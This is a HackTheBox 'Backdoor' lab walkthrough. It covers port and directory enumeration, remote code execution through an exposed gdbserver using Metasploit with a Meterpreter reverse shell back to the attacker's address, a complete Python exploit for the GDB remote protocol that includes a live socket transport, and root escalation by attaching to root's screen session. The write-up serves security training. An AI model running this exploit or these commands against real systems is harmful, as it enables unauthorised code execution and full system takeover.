title: HackTheBox-Backdoor - GNU gdbserver 9.2 - Remote Command Execution (RCE)
author: Mosaic Theory
layout: true
categories: Vulnerability Lab
tags:
• Target Practice Diary
HackTheBox-Backdoor
People love what other people are passionate about.
Recon:
Masscan:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-15 01:20:37 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.11.125
Discovered open port 80/tcp on 10.10.11.125
Discovered open port 1337/tcp on 10.10.11.125
Nmap:
Nmap scan report for 10.10.11.125
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
searchsploit turns up a few entries, but none of obvious use for now (they are all plugin issues matched on the search string; nothing so far shows those plugins are even installed):
>> searchsploit wordpress 5.8.1
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
The directory name is a giveaway (it is the WordPress permalink layout):
http://backdoor.htb/index.php/blog/
The page itself has no relevant information and the links are all the stock WordPress promo links, but post pages have a comment system:
Keep this in mind, it might come in handy. I tried brute-forcing paths on the target:
[09:36:57] 403 - 277B - /.php
[09:37:40] 301 - 0B - /index.php -> http://backdoor.htb/
[09:37:43] 200 - 19KB - /license.txt
[09:37:58] 200 - 7KB - /readme.html
[09:38:00] 403 - 277B - /server-status/
[09:38:00] 403 - 277B - /server-status
[09:38:14] 200 - 1KB - /wp-admin/install.php
[09:38:14] 500 - 3KB - /wp-admin/setup-config.php
[09:38:14] 302 - 0B - /wp-admin/ -> http://backdoor.htb/wp-login.php?redirect_to=http%3A%2F%2Fbackdoor.htb%2Fwp-admin%2F&reauth=1
[09:38:14] 200 - 0B - /wp-config.php
[09:38:14] 400 - 1B - /wp-admin/admin-ajax.php
[09:38:14] 301 - 315B - /wp-admin -> http://backdoor.htb/wp-admin/
[09:38:14] 301 - 317B - /wp-content -> http://backdoor.htb/wp-content/
[09:38:14] 200 - 0B - /wp-content/
[09:38:14] 403 - 277B - /wp-content/plugins/akismet/admin.php
[09:38:14] 403 - 277B - /wp-content/plugins/akismet/akismet.php
[09:38:14] 200 - 776B - /wp-content/upgrade/
[09:38:14] 500 - 0B - /wp-content/plugins/hello.php
[09:38:15] 200 - 1KB - /wp-content/uploads/
[09:38:15] 301 - 318B - /wp-includes -> http://backdoor.htb/wp-includes/
[09:38:15] 200 - 0B - /wp-cron.php
[09:38:15] 200 - 0B - /wp-includes/rss-functions.php
[09:38:15] 200 - 6KB - /wp-login.php
[09:38:15] 302 - 0B - /wp-signup.php -> http://backdoor.htb/wp-login.php?action=register
[09:38:15] 200 - 51KB - /wp-includes/
[09:38:16] 405 - 42B - /xmlrpc.php
Visiting install.php reports that WordPress is already installed and then hands me a login page:
Wrong passwords produce an error, and there is a forgot-password link:
which can be used to enumerate usernames.
Directory listing is enabled and there are a lot of files; digging through them would take a long time, so I set this aside for now, because there is still one port whose purpose I don't know. (`/wp-config.php` answering 200 with a 0-byte body is normal: PHP executed it and printed nothing, so it is not a leak.)
GNU gdbserver 9.2 - Remote Command Execution (RCE):
After a few minutes of Googling, I found that this is probably a gdbserver running on the host, and that it allows code execution:
https://www.exploit-db.com/exploits/50539
This is not a bug in the usual sense: the GDB remote protocol has no authentication, and any client that connects can write the debuggee's memory and resume it, so a gdbserver listening on the network is code execution by design. Although I can't confirm its version, I figured there's no harm in trying:
msf6 exploit(multi/gdb/gdb_server_exec) > show targets
Exploit targets:
Id Name
-- ----
0 x86
1 x86_64
2 ARMLE
3 AARCH64
msf6 exploit(multi/gdb/gdb_server_exec) > set target 1
target => 1
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
[*] 10.10.11.125:1337 - Stepping program to find PC...
[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.10.11.125:1337 - Executing the payload...
[*] Sending stage (3020772 bytes) to 10.10.11.125
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.10.11.125:59136) at 2022-05-15 10:18:05 +0800
meterpreter >
Works perfectly.
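To make the "vulnerability" concrete, here is an added Python walk-through of the protocol exchange that the exploit-db script and the Metasploit module above both drive. It is my own example, not code from either of those tools or from this writeup. The `FakeGdbserver` class is a constructed stand-in so the code runs offline; `socket_transport` is the piece you would pass instead against a live target (host and port are hypothetical, supplied by the caller). Two assumptions the page does not verify: the target is amd64 and gdbserver answers `g` in GDB's standard amd64 register order (rip is register 16), and a single step leaves rip in mapped executable code, which is why the tools step before writing.

```python
"""GDB Remote Serial Protocol (RSP) walk-through of the gdbserver RCE.

Added example: not the exploit-db 50539 script and not Metasploit's
multi/gdb/gdb_server_exec. FakeGdbserver is constructed for offline use.
Assumed: amd64 target, GDB's standard register order (rip = index 16).
"""
import socket

AMD64_REGS = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp",
              "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "rip"]
RIP_INDEX = AMD64_REGS.index("rip")

def rsp_checksum(body: bytes) -> int:
    return sum(body) % 256

def rsp_encode(body: bytes) -> bytes:
    """Frame a packet: '$' body '#' two-hex-digit checksum. There is no auth anywhere."""
    return b"$" + body + b"#" + b"%02x" % rsp_checksum(body)

def rsp_decode(frame: bytes) -> bytes:
    """Unframe a packet and verify its checksum; raises ValueError if corrupt."""
    if not frame.startswith(b"$") or frame[-3:-2] != b"#":
        raise ValueError("not an RSP packet: %r" % frame)
    body = frame[1:-3]
    if rsp_checksum(body) != int(frame[-2:], 16):
        raise ValueError("bad checksum on %r" % frame)
    return body

def pc_from_g_reply(reply: bytes) -> int:
    """Pull rip out of a 'g' (read all registers) reply: 8-byte regs as little-endian hex."""
    field = reply[RIP_INDEX * 16:(RIP_INDEX + 1) * 16]
    if len(field) != 16 or b"x" in field:          # 'xx..' marks an unavailable register
        raise ValueError("rip not present in g reply")
    return int.from_bytes(bytes.fromhex(field.decode()), "little")

def write_memory_packet(addr: int, data: bytes) -> bytes:
    """'M addr,len:hex' writes the debuggee via ptrace, which ignores page protections."""
    return b"M%x,%x:%s" % (addr, len(data), data.hex().encode())

def run_exploit(send, shellcode: bytes) -> int:
    """Handshake, single-step, locate PC, overwrite the code there, resume.

    `send(body, wait_reply=True)` is any transport that frames `body`, returns the
    decoded reply body, and does not wait for a reply when wait_reply is False.
    """
    send(b"qSupported:multiprocess+;vContSupported+")  # capability exchange
    send(b"?")                                         # why is the inferior stopped?
    send(b"vCont;s")                                   # step once so rip is in mapped code
    pc = pc_from_g_reply(send(b"g"))                   # read registers, extract rip
    if send(write_memory_packet(pc, shellcode)) != b"OK":
        raise RuntimeError("memory write refused")
    send(b"vCont;c", wait_reply=False)                 # continue: our bytes run as gdbserver's user
    return pc

class FakeGdbserver:
    """Constructed stand-in for an exposed gdbserver (offline use only)."""
    def __init__(self, pc: int):
        self.pc, self.writes, self.resumed = pc, [], False

    def __call__(self, body: bytes, wait_reply: bool = True) -> bytes:
        if body.startswith(b"qSupported"):
            return b"PacketSize=3fff;vContSupported+"
        if body in (b"?", b"vCont;s"):
            return b"T05thread:p1.1;"                  # stopped with SIGTRAP
        if body == b"g":
            regs = [0] * len(AMD64_REGS)
            regs[RIP_INDEX] = self.pc
            return b"".join(r.to_bytes(8, "little").hex().encode() for r in regs)
        if body.startswith(b"M"):
            spec, hexdata = body[1:].split(b":", 1)
            addr, length = (int(x, 16) for x in spec.split(b","))
            data = bytes.fromhex(hexdata.decode())
            if len(data) != length:
                return b"E01"
            self.writes.append((addr, data))
            return b"OK"
        if body == b"vCont;c":
            self.resumed = True
        return b""                                     # empty reply = unsupported packet

def socket_transport(host: str, port: int, timeout: float = 5.0):
    """Transport for a live gdbserver; host/port are whatever the caller targets."""
    sock = socket.create_connection((host, port), timeout=timeout)

    def send(body: bytes, wait_reply: bool = True) -> bytes:
        sock.sendall(rsp_encode(body))
        if not wait_reply:
            return b""
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("gdbserver closed the connection")
            buf = (buf + chunk).lstrip(b"+")           # leading '+' is just the server's ack
            end = buf.find(b"#")
            if buf.startswith(b"$") and end != -1 and len(buf) >= end + 3:
                sock.sendall(b"+")                     # ack the reply
                return rsp_decode(buf[:end + 3])
    return send

if __name__ == "__main__":
    fake = FakeGdbserver(0x7FFFF7FD0103)               # the address Metasploit wrote to above
    pc = run_exploit(fake, b"\xcc" * 4)                # int3 x4 stands in for real shellcode
    print("wrote %d bytes at %#x, resumed=%s" % (len(fake.writes[0][1]), pc, fake.resumed))
```

The point to take away is that every step is an ordinary, documented RSP request: the only thing separating "remote debugging" from "remote code execution" is who is allowed to reach the port, so the fix is network-level (bind to localhost, firewall, or tunnel over SSH), not a patch.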
meterpreter > shell
Process 10693 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
user@Backdoor:~$ ls
ls
user.txt
user@Backdoor:~$ cat user.txt
cat user.txt
615482..........................
Getting root:
sudo -l asks for a password, which I don't have. Enumerating SUID binaries turns up screen (on a stock Ubuntu install screen is setgid utmp, not setuid root, so this is a non-default setup):
user@Backdoor:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
user@Backdoor:~$
screen is a terminal multiplexer. `-x` attaches to a session that is still attached elsewhere, and the `user/name` form lets a setuid-root screen attach to another user's session, so if root has a session named `root` I can attach to it and land in root's shell. screen refuses to start without a TERM variable, so one has to be exported first:
user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
Please set a terminal type.
user@Backdoor:~$ screen
screen
Please set a terminal type.
user@Backdoor:~$ export TERM=xterm
export TERM=xterm
user@Backdoor:~$ /usr/bin/screen -x root/root
root@Backdoor:~# whoami
whoami
root
root@Backdoor:~# cat /root/root.txt
cat /root/root.txt
cd.................................